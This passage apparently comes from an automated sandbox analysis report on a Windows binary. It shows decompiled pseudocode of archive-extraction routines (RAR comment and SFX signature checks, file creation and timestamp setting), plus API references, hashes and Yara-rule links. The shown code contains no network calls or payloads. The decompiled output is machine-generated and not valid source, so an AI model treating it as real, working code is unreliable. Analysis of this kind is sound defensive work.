Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID: l*C
API String ID: 3519838083-1043478356
Opcode ID: 92439689e5cb23c882765e49c0d8f578d6677891cc7064b5a687186904715ed9
Instruction ID: acaba60c000dfef704198359a574edf995ac5869521e864be6b23dd49fafd615
Opcode Fuzzy Hash: 92439689e5cb23c882765e49c0d8f578d6677891cc7064b5a687186904715ed9
Instruction Fuzzy Hash: CE419B31900608DBCF28EB55D985BEAB775AF41304F0440BEEA497F2C2CB785E85CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004017A4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004017A4(intOrPtr* __ecx, void* __edx) {
				void* __edi;
				void* _t25;
				signed int _t27;
				intOrPtr _t30;
				signed int _t31;
				intOrPtr _t35;
				void* _t54;
				void* _t58;

				_t51 = __edx;
				E00419DD4(E0042927F, _t58);
				_t56 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xa236)) != 0) {
					E00401188(_t58 - 0x1c, __edx, __ecx);
					 *(_t58 - 4) = 0;
					__eflags =  *(__ecx + 0x576c);
					if( *(__ecx + 0x576c) == 0) {
						_push(0);
						_t25 = E00401B47(__ecx);
						_push(_t51);
						 *((intOrPtr*)( *__ecx + 0xc))();
						_t27 = E00403707(__ecx, _t51, _t58, __eflags, "CMT");
						_t54 = _t25;
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							 *((char*)(_t58 + 0xb)) = 0;
						} else {
							_push( *((intOrPtr*)(_t58 + 8)));
							_t31 = E0040133F(_t56, _t54); // executed
							 *((char*)(_t58 + 0xb)) = 1;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L6;
							}
						}
					} else {
						_push(0);
						_push(0);
						_push( *((intOrPtr*)(__ecx + 0xa240)) + 0x14);
						 *((intOrPtr*)( *__ecx + 0xc))();
						E0040363F(__edx, _t58);
						_t35 =  *((intOrPtr*)(_t58 + 8));
						__eflags =  *(_t35 + 4);
						 *((char*)(_t58 + 0xb)) =  *(_t35 + 4) > 0;
					}
					_t15 = _t58 - 4;
					 *_t15 =  *(_t58 - 4) | 0xffffffff;
					__eflags =  *_t15;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t58 - 0x1c)))) + 0xc))( *((intOrPtr*)(_t58 - 0x14)),  *((intOrPtr*)(_t58 - 0x10)), 0);
					_t30 =  *((intOrPtr*)(_t58 + 0xb));
				} else {
					_t30 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t30;
			}

0x004017a4
0x004017a9
0x004017b3
0x004017bd
0x004017ca
0x004017cf
0x004017d2
0x004017d8
0x00401803
0x00401806
0x0040180b
0x0040180f
0x00401819
0x0040181e
0x0040181f
0x00401821
0x00401835
0x00401835
0x00401823
0x00401823
0x00401828
0x0040182d
0x00401831
0x00401833
0x00000000
0x00000000
0x00401833
0x004017da
0x004017e2
0x004017e6
0x004017e7
0x004017ea
0x004017ef
0x004017f4
0x004017f7
0x004017fa
0x004017fa
0x0040183d
0x0040183d
0x0040183d
0x00401848
0x0040184b
0x004017bf
0x004017bf
0x004017bf
0x00401853
0x0040185b

APIs

__EH_prolog.LIBCMT ref: 004017A9

Strings

CMT, xrefs: 00401812

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog
String ID: CMT
API String ID: 3519838083-2756464174
Opcode ID: 0d17fcf4e63c3f00a1c65aa8fb4df2691f8da2dc69d7bea9992ba20059b78c1b
Instruction ID: 7b22fe96a6068842e79bf034f144042bac5b113788ed832948497627b213d9ab
Opcode Fuzzy Hash: 0d17fcf4e63c3f00a1c65aa8fb4df2691f8da2dc69d7bea9992ba20059b78c1b
Instruction Fuzzy Hash: A921C371604154AFCB05AF6488508AEBBA9EF46314B44C07EF856773D2CB385E01CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004087BE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004087BE(void* __ecx) {
				void* _t9;
				int _t12;
				void* _t13;
				void* _t19;

				_t19 = __ecx;
				_t9 =  *(__ecx + 4);
				_t13 = 1;
				if(_t9 != 0xffffffff) {
					if( *((char*)(__ecx + 0x10)) == 0 &&  *((intOrPtr*)(__ecx + 0xc)) == 0) {
						_t12 = FindCloseChangeNotification(_t9); // executed
						asm("sbb bl, bl");
						_t13 =  ~(_t12 - 1) + 1;
					}
					 *(_t19 + 4) =  *(_t19 + 4) | 0xffffffff;
				}
				 *(_t19 + 0xc) =  *(_t19 + 0xc) & 0x00000000;
				if(_t13 == 0 &&  *((intOrPtr*)(_t19 + 0x14)) != _t13) {
					E0040630A(0x432a6c, _t19 + 0x1e);
				}
				return _t13;
			}

0x004087c0
0x004087c2
0x004087c5
0x004087ca
0x004087d0
0x004087d9
0x004087e4
0x004087e6
0x004087e6
0x004087e8
0x004087e8
0x004087ec
0x004087f2
0x00408802
0x00408802
0x0040880b

APIs

FindCloseChangeNotification.KERNELBASE(?,73BAF370,00000000,00408434,?,?,?,?,004071E8,?,00000000,?,00000800,?,?,?), ref: 004087D9

Strings

l*C, xrefs: 004087FD

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindNotification
String ID: l*C
API String ID: 2591292051-1043478356
Opcode ID: 5ead4bd9ea92eb6087bde11806a9a08149abbe9cd3bf38cb99501caac32a1d1c
Instruction ID: 7e501cd94c5395711b7b7e0be71f3f63ef1eff187e767eb79b572afaeeb936d5
Opcode Fuzzy Hash: 5ead4bd9ea92eb6087bde11806a9a08149abbe9cd3bf38cb99501caac32a1d1c
Instruction Fuzzy Hash: A0F027715827004FE73066348A48393B3D84B19335F14973FD8E6A33C1C77958484A65

Uniqueness

Uniqueness Score: -1.00%

Function 0040146C, Relevance: 3.3, APIs: 2, Instructions: 259
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040146C(signed int* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t91;
				void* _t94;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t106;
				signed int _t107;
				signed int _t108;
				signed int _t116;
				signed int _t119;
				char* _t130;
				signed int _t131;
				signed int _t132;
				signed int _t134;
				char* _t139;
				void* _t140;
				void* _t176;
				signed int _t177;
				signed int* _t179;
				signed int _t180;
				signed int* _t182;
				void* _t186;

				_t173 = __edx;
				E00419DD4(E00429031, _t186);
				_t182 = __ecx;
				_push(7);
				_t175 = __ecx + 0x5740;
				_push(__ecx + 0x5740);
				 *((char*)(__ecx + 0xa23c)) = 0;
				 *((char*)(__ecx + 0xa244)) = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__ecx)) + 8))() == 7) {
					 *((intOrPtr*)(__ecx + 0xa240)) = 0;
					_t91 = E00401069(_t175, 7);
					__eflags = _t91;
					if(_t91 == 0) {
						E00401306(_t186 - 0x24, 0x100000);
						 *(_t186 - 4) = 0;
						_t94 =  *((intOrPtr*)( *_t182 + 0x10))();
						_t176 = _t94;
						_t96 =  *((intOrPtr*)( *_t182 + 8))( *(_t186 - 0x24),  *((intOrPtr*)(_t186 - 0x20)) + 0xfffffff0);
						_t173 = 0;
						__eflags = _t96;
						 *(_t186 - 0x10) = _t96;
						if(_t96 <= 0) {
							L21:
							__eflags = _t182[0x2890];
							if(_t182[0x2890] != 0) {
								 *(_t186 - 4) =  *(_t186 - 4) | 0xffffffff;
								__eflags =  *(_t186 - 0x24);
								if(__eflags != 0) {
									_push( *(_t186 - 0x24));
									E00419DFE(0, _t176, _t182, __eflags); // executed
								}
								L26:
								_t97 = _t182[0x288c];
								__eflags = _t97 - 4;
								if(_t97 != 4) {
									__eflags = _t97 - 3;
									if(_t97 != 3) {
										_t182[0x15d2] = 7;
										while(1) {
											L36:
											_t98 = E0040363F(_t173, _t186);
											__eflags = _t98;
											if(_t98 == 0) {
												break;
											}
											_t99 = _t182[0x15c9];
											__eflags = _t99 - 1;
											if(_t99 == 1) {
												break;
											}
											__eflags = _t182[0x15ca];
											if(_t182[0x15ca] == 0) {
												L35:
												E004010BF(_t182);
												continue;
											}
											__eflags = _t99 - 4;
											if(_t99 == 4) {
												break;
											}
											goto L35;
										}
										__eflags = _t182[0x2891];
										if(_t182[0x2891] == 0) {
											L39:
											E004010BF(_t182);
											__eflags = _t182[0x2891];
											if(_t182[0x2891] == 0) {
												L41:
												_t182[0x288d] = _t182[0x15db];
												__eflags = _t182[0x15ca];
												if(_t182[0x15ca] == 0) {
													L43:
													E00401188(_t186 - 0x34, _t173, _t182);
													_t177 = _t182[0x2888];
													 *(_t186 - 0x18) = _t182[0x2889];
													 *(_t186 - 0x14) = _t182[0x288a];
													 *(_t186 - 4) = 1;
													 *(_t186 - 0x10) = _t182[0x288b];
													while(1) {
														_t106 = E0040363F(_t173, _t186);
														__eflags = _t106;
														if(_t106 == 0) {
															break;
														}
														_t107 = _t182[0x15c9];
														__eflags = _t107 - 3;
														if(_t107 != 3) {
															__eflags = _t107 - 2;
															if(_t107 == 2) {
																__eflags = _t182[0x288d];
																if(_t182[0x288d] == 0) {
																	L57:
																	_t108 = 0;
																	__eflags = 0;
																	L58:
																	_t182[0x288e] = _t108;
																	L59:
																	_t72 = _t186 - 4;
																	 *_t72 =  *(_t186 - 4) | 0xffffffff;
																	__eflags =  *_t72;
																	_t182[0x2889] =  *(_t186 - 0x18);
																	_t182[0x288a] =  *(_t186 - 0x14);
																	_t182[0x2888] = _t177;
																	_t182[0x288b] =  *(_t186 - 0x10);
																	 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 - 0x34)))) + 0xc))( *((intOrPtr*)(_t186 - 0x2c)),  *((intOrPtr*)(_t186 - 0x28)), 0);
																	L60:
																	__eflags = _t182[0x288d];
																	if(_t182[0x288d] == 0) {
																		L62:
																		__eflags =  &(_t182[0x289e]);
																		E0041A0EF( &(_t182[0x289e]),  &(_t182[7]));
																		L63:
																		_t116 = 1;
																		L64:
																		 *[fs:0x0] =  *((intOrPtr*)(_t186 - 0xc));
																		return _t116;
																	}
																	__eflags = _t182[0x288e];
																	if(_t182[0x288e] == 0) {
																		goto L63;
																	}
																	goto L62;
																}
																__eflags = _t182[0x1a14];
																if(_t182[0x1a14] != 0) {
																	goto L57;
																}
																_t108 = 1;
																goto L58;
															}
															L51:
															E004010BF(_t182);
															continue;
														}
														__eflags = _t182[0x288d];
														if(_t182[0x288d] == 0) {
															L48:
															_t119 = 0;
															__eflags = 0;
															L49:
															_t182[0x288e] = _t119;
															goto L51;
														}
														__eflags = _t182[0x22e4];
														if(_t182[0x22e4] != 0) {
															goto L48;
														}
														_t119 = 1;
														goto L49;
													}
													goto L59;
												}
												__eflags = _t182[0x288f];
												if(_t182[0x288f] != 0) {
													goto L60;
												}
												goto L43;
											}
											E004012DD(0x19,  &(_t182[7]));
											__eflags =  *(_t186 + 8);
											if( *(_t186 + 8) == 0) {
												goto L1;
											}
											goto L41;
										}
										__eflags =  *(_t186 + 8);
										if( *(_t186 + 8) == 0) {
											goto L1;
										}
										goto L39;
									}
									_t179 =  &(_t182[0x15d1]);
									 *((intOrPtr*)( *_t182 + 8))(_t179, 1);
									__eflags =  *_t179;
									if( *_t179 != 0) {
										goto L1;
									}
									_t182[0x15d2] = 8;
									goto L36;
								}
								E004012DD(0x3b,  &(_t182[7]));
								goto L1;
							}
							__eflags =  *(_t186 - 0x24);
							if(__eflags != 0) {
								_push( *(_t186 - 0x24));
								E00419DFE(0, _t176, _t182, __eflags);
							}
							goto L1;
						} else {
							goto L6;
						}
						do {
							L6:
							_t130 =  *(_t186 - 0x24) + _t173;
							__eflags =  *_t130 - 0x52;
							if( *_t130 != 0x52) {
								goto L16;
							}
							_t131 = E00401069(_t130,  *(_t186 - 0x10) - _t173);
							__eflags = _t131;
							if(_t131 == 0) {
								goto L16;
							}
							_t182[0x288c] = _t131;
							__eflags = _t131 - 1;
							if(_t131 != 1) {
								L18:
								_t132 = _t173 + _t176;
								_t173 =  *_t182;
								_t182[0x2890] = _t132;
								 *((intOrPtr*)( *_t182 + 0xc))(_t132, 0, 0);
								_t134 = _t182[0x288c];
								__eflags = _t134 - 2;
								if(_t134 == 2) {
									L20:
									_t173 =  *_t182;
									 *((intOrPtr*)( *_t182 + 8))( &(_t182[0x15d0]), 7);
									goto L21;
								}
								__eflags = _t134 - 3;
								if(_t134 != 3) {
									goto L21;
								}
								goto L20;
							}
							__eflags = _t173;
							if(_t173 <= 0) {
								goto L18;
							}
							__eflags = _t176 - 0x1c;
							if(_t176 >= 0x1c) {
								goto L18;
							}
							__eflags =  *(_t186 - 0x10) - 0x1f;
							if( *(_t186 - 0x10) <= 0x1f) {
								goto L18;
							}
							_t139 =  *(_t186 - 0x24) - _t176 + 0x1c;
							__eflags =  *_t139 - 0x52;
							if( *_t139 != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t139 + 1)) - 0x53;
							if( *((char*)(_t139 + 1)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t139 + 2)) - 0x46;
							if( *((char*)(_t139 + 2)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t139 + 3)) - 0x58;
							if( *((char*)(_t139 + 3)) == 0x58) {
								goto L18;
							}
							L16:
							_t173 = _t173 + 1;
							__eflags = _t173 -  *(_t186 - 0x10);
						} while (_t173 <  *(_t186 - 0x10));
						goto L21;
					}
					_t182[0x288c] = _t91;
					__eflags = _t91 - 1;
					if(_t91 == 1) {
						_t180 =  *_t182;
						_t140 =  *((intOrPtr*)(_t180 + 0x10))(0);
						asm("sbb edx, ebx");
						 *((intOrPtr*)(_t180 + 0xc))(_t140 - 7, __edx);
					}
					goto L26;
				}
				L1:
				_t116 = 0;
				goto L64;
			}

0x0040146c
0x00401471
0x0040147b
0x00401480
0x00401484
0x0040148a
0x0040148b
0x00401491
0x0040149d
0x004014ab
0x004014b1
0x004014b6
0x004014b8
0x004014ea
0x004014f3
0x004014f6
0x00401503
0x00401509
0x0040150c
0x0040150e
0x00401510
0x00401513
0x004015a9
0x004015a9
0x004015af
0x004015c8
0x004015cc
0x004015cf
0x004015d1
0x004015d4
0x004015d9
0x004015da
0x004015da
0x004015e0
0x004015e3
0x004015f5
0x004015f8
0x0040161e
0x00401649
0x00401649
0x0040164b
0x00401650
0x00401652
0x00000000
0x00000000
0x0040162a
0x00401630
0x00401633
0x00000000
0x00000000
0x00401635
0x0040163b
0x00401642
0x00401644
0x00000000
0x00401644
0x0040163d
0x00401640
0x00000000
0x00000000
0x00000000
0x00401640
0x00401654
0x0040165a
0x00401665
0x00401667
0x0040166c
0x00401672
0x00401688
0x0040168e
0x00401694
0x0040169a
0x004016a8
0x004016ac
0x004016b7
0x004016bd
0x004016c6
0x004016cf
0x004016d6
0x00401711
0x00401713
0x00401718
0x0040171a
0x00000000
0x00000000
0x004016db
0x004016e1
0x004016e4
0x00401705
0x00401708
0x0040171e
0x00401724
0x00401733
0x00401733
0x00401733
0x00401735
0x00401735
0x0040173b
0x00401741
0x00401741
0x00401741
0x00401745
0x00401752
0x0040175e
0x00401764
0x0040176c
0x0040176f
0x0040176f
0x00401775
0x0040177f
0x00401783
0x0040178a
0x00401791
0x00401791
0x00401793
0x00401799
0x004017a1
0x004017a1
0x00401777
0x0040177d
0x00000000
0x00000000
0x00000000
0x0040177d
0x00401726
0x0040172c
0x00000000
0x00000000
0x00401730
0x00000000
0x00401730
0x0040170a
0x0040170c
0x00000000
0x0040170c
0x004016e6
0x004016ec
0x004016fb
0x004016fb
0x004016fb
0x004016fd
0x004016fd
0x00000000
0x004016fd
0x004016ee
0x004016f4
0x00000000
0x00000000
0x004016f8
0x00000000
0x004016f8
0x00000000
0x0040171c
0x0040169c
0x004016a2
0x00000000
0x00000000
0x00000000
0x004016a2
0x0040167a
0x0040167f
0x00401682
0x00000000
0x00000000
0x00000000
0x00401682
0x0040165c
0x0040165f
0x00000000
0x00000000
0x00000000
0x0040165f
0x004015fe
0x00401607
0x0040160a
0x0040160c
0x00000000
0x00000000
0x00401612
0x00000000
0x00401612
0x004015eb
0x00000000
0x004015eb
0x004015b1
0x004015b4
0x004015ba
0x004015bd
0x004015c2
0x00000000
0x00000000
0x00000000
0x00000000
0x00401519
0x00401519
0x0040151c
0x0040151e
0x00401521
0x00000000
0x00000000
0x0040152c
0x00401531
0x00401533
0x00000000
0x00000000
0x00401535
0x0040153b
0x0040153e
0x00401576
0x00401577
0x0040157a
0x00401580
0x00401586
0x00401589
0x0040158f
0x00401592
0x00401599
0x00401599
0x004015a6
0x00000000
0x004015a6
0x00401594
0x00401597
0x00000000
0x00000000
0x00000000
0x00401597
0x00401540
0x00401542
0x00000000
0x00000000
0x00401544
0x00401547
0x00000000
0x00000000
0x00401549
0x0040154d
0x00000000
0x00000000
0x00401554
0x00401557
0x0040155a
0x00000000
0x00000000
0x0040155c
0x00401560
0x00000000
0x00000000
0x00401562
0x00401566
0x00000000
0x00000000
0x00401568
0x0040156c
0x00000000
0x00000000
0x0040156e
0x0040156e
0x0040156f
0x0040156f
0x00000000
0x00401574
0x004014ba
0x004014c0
0x004014c3
0x004014c9
0x004014ce
0x004014d4
0x004014da
0x004014da
0x00000000
0x004014c3
0x0040149f
0x0040149f
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00401471
_wcscpy.LIBCMT ref: 0040178A

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog_wcscpy
String ID:
API String ID: 2825759377-0
Opcode ID: 8c57ece3b46ee0f1eec9bb012236b981de6ebdb78ecd0f138d5ef0681c42f477
Instruction ID: 4dfa9cfdfb03763694249a6b59c12004c8a218a9dbb135445a3374bb5b90ac3c
Opcode Fuzzy Hash: 8c57ece3b46ee0f1eec9bb012236b981de6ebdb78ecd0f138d5ef0681c42f477
Instruction Fuzzy Hash: 40A1C471A04740AFDB30DB78C8915AFBBE5AF4A300F14493FE09AE72A1D7395D448B5A

Uniqueness

Uniqueness Score: -1.00%

Function 00408AB6, Relevance: 3.1, APIs: 2, Instructions: 82
timeCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00408AB6(intOrPtr __ecx, signed int* _a4, signed char _a7, signed int* _a8, signed char _a11, signed int* _a12) {
				intOrPtr _v8;
				void* _v16;
				void* _v24;
				void* _v32;
				signed char _t28;
				int _t39;
				signed char _t54;
				signed int* _t57;
				signed int* _t64;
				signed int* _t67;

				_t28 =  *(__ecx + 0x18);
				_v8 = __ecx;
				if(_t28 != 0x100 && (_t28 & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t57 = _a4;
				if(_t57 == 0) {
					L5:
					_a7 = 0;
				} else {
					_a7 = 1;
					if(( *_t57 | _t57[1]) == 0) {
						goto L5;
					}
				}
				_t64 = _a8;
				if(_t64 == 0) {
					L8:
					_a11 = 0;
				} else {
					_a11 = 1;
					if(( *_t64 | _t64[1]) == 0) {
						goto L8;
					}
				}
				_t67 = _a12;
				if(_t67 == 0 || ( *_t67 | _t67[1]) == 0) {
					_t54 = 0;
				} else {
					_t54 = 1;
				}
				if(_a7 != 0) {
					E00410EF6(_t57,  &_v16);
				}
				if(_a11 != 0) {
					E00410EF6(_t64,  &_v32);
				}
				if(_t54 != 0) {
					E00410EF6(_t67,  &_v24);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t39 = SetFileTime( *(_v8 + 4),  ~(_a11 & 0x000000ff) &  &_v32,  ~(_t54 & 0x000000ff) &  &_v24,  ~(_a7 & 0x000000ff) &  &_v16); // executed
				return _t39;
			}

0x00408abc
0x00408abf
0x00408ac7
0x00408ad0
0x00408ad0
0x00408ad6
0x00408adb
0x00408ae8
0x00408ae8
0x00408add
0x00408ae2
0x00408ae6
0x00000000
0x00000000
0x00408ae6
0x00408aef
0x00408af4
0x00408b01
0x00408b01
0x00408af6
0x00408afb
0x00408aff
0x00000000
0x00000000
0x00408aff
0x00408b05
0x00408b0a
0x00408b17
0x00408b13
0x00408b13
0x00408b13
0x00408b1d
0x00408b23
0x00408b23
0x00408b2c
0x00408b34
0x00408b34
0x00408b3b
0x00408b43
0x00408b43
0x00408b4e
0x00408b5b
0x00408b69
0x00408b77
0x00408b81

APIs

FlushFileBuffers.KERNEL32(?), ref: 00408AD0
SetFileTime.KERNELBASE(?,00000000,00000000,00000000), ref: 00408B77

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 3a4c722dcd2e2b2508363f14ff1059dfb0eebc4592b38e4c156612c9e2f2c62c
Instruction ID: 61a9146ac70ac076b171bc9eccde74c951de77e22bf15c08a47b653bedd50b29
Opcode Fuzzy Hash: 3a4c722dcd2e2b2508363f14ff1059dfb0eebc4592b38e4c156612c9e2f2c62c
Instruction Fuzzy Hash: F121CE71600148AFCF15CF68CA45BEB7BA4AF15304F18846EF895EB280DB78EA45DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004086D1, Relevance: 3.1, APIs: 2, Instructions: 77
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004086D1(void* __ecx, WCHAR* _a4, long _a8) {
				long _v8;
				short _v4104;
				signed char _t32;
				long _t34;
				void* _t35;
				signed char _t46;
				long _t51;
				char _t52;
				void* _t56;

				E0041A3E0(0x1004);
				_t56 = __ecx;
				_t46 = _a8;
				_t32 = _t46 >> 0x00000001 & 0x00000001;
				if((_t46 & 0x00000008) != 0 ||  *((intOrPtr*)(__ecx + 0x1c)) != 0) {
					_t52 = 1;
				} else {
					_t52 = 0;
				}
				 *(_t56 + 0x18) = _t46;
				_t51 = ((0 | _t32 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t34 = 0 | _t52 != 0x00000000;
				_v8 = _t51;
				_a8 = _t34;
				_t35 = CreateFileW(_a4, _t51, _t34, 0, 2, 0, 0); // executed
				 *(_t56 + 4) = _t35;
				if(_t35 == 0xffffffff && E0040A582(_a4,  &_v4104, 0x800) != 0) {
					 *(_t56 + 4) = CreateFileW( &_v4104, _v8, _a8, 0, 2, 0, 0);
				}
				 *((char*)(_t56 + 0x12)) = 1;
				 *((intOrPtr*)(_t56 + 0xc)) = 0;
				 *((char*)(_t56 + 0x10)) = 0;
				E0041078F(_t56 + 0x1e, _a4, 0x800);
				return 0 |  *(_t56 + 4) != 0xffffffff;
			}

0x004086d9
0x004086e0
0x004086e2
0x004086e9
0x004086f1
0x004086fc
0x004086f8
0x004086f8
0x004086f8
0x004086fe
0x0040871c
0x00408724
0x00408727
0x0040872f
0x00408732
0x00408734
0x0040873a
0x00408768
0x00408768
0x00408777
0x0040877b
0x0040877e
0x00408781
0x00408793

APIs

CreateFileW.KERNELBASE(?,-C0000001,00000000,00000000,00000002,00000000,00000000,?,?,-00000009,?,00408524,?,-00000009,?,00000001), ref: 00408732
CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,00000800,?,00408524,?,-00000009,?,00000001), ref: 00408766

Memory Dump Source

Source File: 00000000.00000002.647038187.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.647031779.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647066538.000000000042A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.647072384.000000000042F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647090561.000000000044E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.647103322.0000000000451000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 62471731f7841d57d3ee0969ea94c5f1d85bd199c3a6aa2ad93c93be8a958db7
Instruction ID: ac8b6623fe0b780f4b6ed4495d1ced75404b80f2fac311de3d18f9912821647d
Opcode Fuzzy Hash: 62471731f7841d57d3ee0969ea94c5f1d85bd199c3a6aa2ad93c93be8a958db7
Instruction Fuzzy Hash: 3521D771500708AFEB209F248C41FEB7BACEB04368F00892EF995D72D1D675ED489B54

Uniqueness

Uniqueness Score: -1.00%

Function 0040133F, Relevance: 3.1, APIs: 2, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040133F(void* __ecx, void* __edi) {
				void* __ebx;
				void* __esi;
				void* _t30;
				void* _t37;
				void* _t55;
				unsigned int _t57;
				void* _t58;
				signed int _t59;
				intOrPtr* _t62;
				void* _t64;

				E00419DD4(E004291F1, _t64);
				_t44 = __ecx;
				 *(_t64 - 0x1c) = 0;
				 *(_t64 - 0x18) = 0;
				 *((intOrPtr*)(_t64 - 0x14)) = 0;
				 *((intOrPtr*)(_t64 - 0x10)) = 0;
				 *((intOrPtr*)(_t64 - 4)) = 0;
				_t30 = E00402C37(__ecx, _t55, _t64 - 0x1c, 0); // executed
				if(_t30 != 0) {
					_push(__edi);
					_t57 =  *(_t64 - 0x18);
					E004012C2(_t64 - 0x1c, 0);
					_t62 =  *((intOrPtr*)(_t64 + 8));
					_t48 = _t62;
					E00401325(_t62, _t57 + 1);
					__eflags =  *((intOrPtr*)(__ecx + 0xa230)) - 3;
					if( *((intOrPtr*)(__ecx + 0xa230)) != 3) {
						__eflags =  *(__ecx + 0x7b24) & 0x00000001;
						if(( *(__ecx + 0x7b24) & 0x00000001) == 0) {
							E00411682( *(_t64 - 0x1c),  *_t62,  *((intOrPtr*)(_t62 + 4)));
						} else {
							_t59 = _t57 >> 1;
							E004116ED( *(_t64 - 0x1c),  *_t62, _t59);
							 *((short*)( *_t62 + _t59 * 2)) = 0;
						}
					} else {
						E00411817(_t48,  *(_t64 - 0x1c),  *_t62,  *((intOrPtr*)(_t62 + 4)));
					}
					E00401325(_t62, E0041A0A7( *_t62));
					__eflags =  *(_t64 - 0x1c);
					_pop(_t58);
					if(__eflags != 0) {
						_push( *(_t64 - 0x1c));
						E00419DFE(_t44, _t58, _t62, __eflags);
					}
					_t37 = 1;
				} else {
					_t70 =  *(_t64 - 0x1c);
					if( *(_t64 - 0x1c) != 0) {
						_push( *(_t64 - 0x1c));
						E00419DFE(__ecx, __edi, 0, _t70);
					}
					_t37 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return _t37;
			}

0x00401344
0x00401350
0x00401352
0x00401355
0x00401358
0x0040135b
0x00401363
0x00401366
0x0040136d
0x00401384
0x00401385
0x0040138c
0x00401391
0x00401398
0x0040139a
0x0040139f
0x004013a6
0x004013b7
0x004013be
0x004013df
0x004013c0
0x004013c0
0x004013c8
0x004013d1
0x004013d1
0x004013a8
0x004013b0
0x004013b0
0x004013ef
0x004013f4
0x004013f8
0x004013f9
0x004013fb
0x004013fe
0x00401403
0x00401404
0x0040136f
0x0040136f
0x00401372
0x00401374
0x00401377
0x0040137c
0x0040137d
0x0040137d
0x0040140b
0x00401413

APIs

__EH_prolog.LIBCMT ref: 00401344

Part of subcall function 00402C37: __EH_prolog.LIBCMT ref: 00402C3C

_wcslen.LIBCMT ref: 004013E6

Part of subcall function 00419DFE: __lock.LIBCMT ref: 00419E1C
Part of subcall function 00419DFE: ___sbh_find_block.LIBCMT ref: 00419E27
Part of subcall function 00419DFE: ___sbh_free_block.LIBCMT ref: 00419E36
Part of subcall function 00419DFE: RtlFreeHeap.NTDLL(00000000,00000000,0042D618,0000000C,0041E984,00000000,0042D8F0,0000000C,0041E9BE,00000000,0041A29B,?,00424CE6,00000004,0042DA90,0000000C), ref: 00419E66
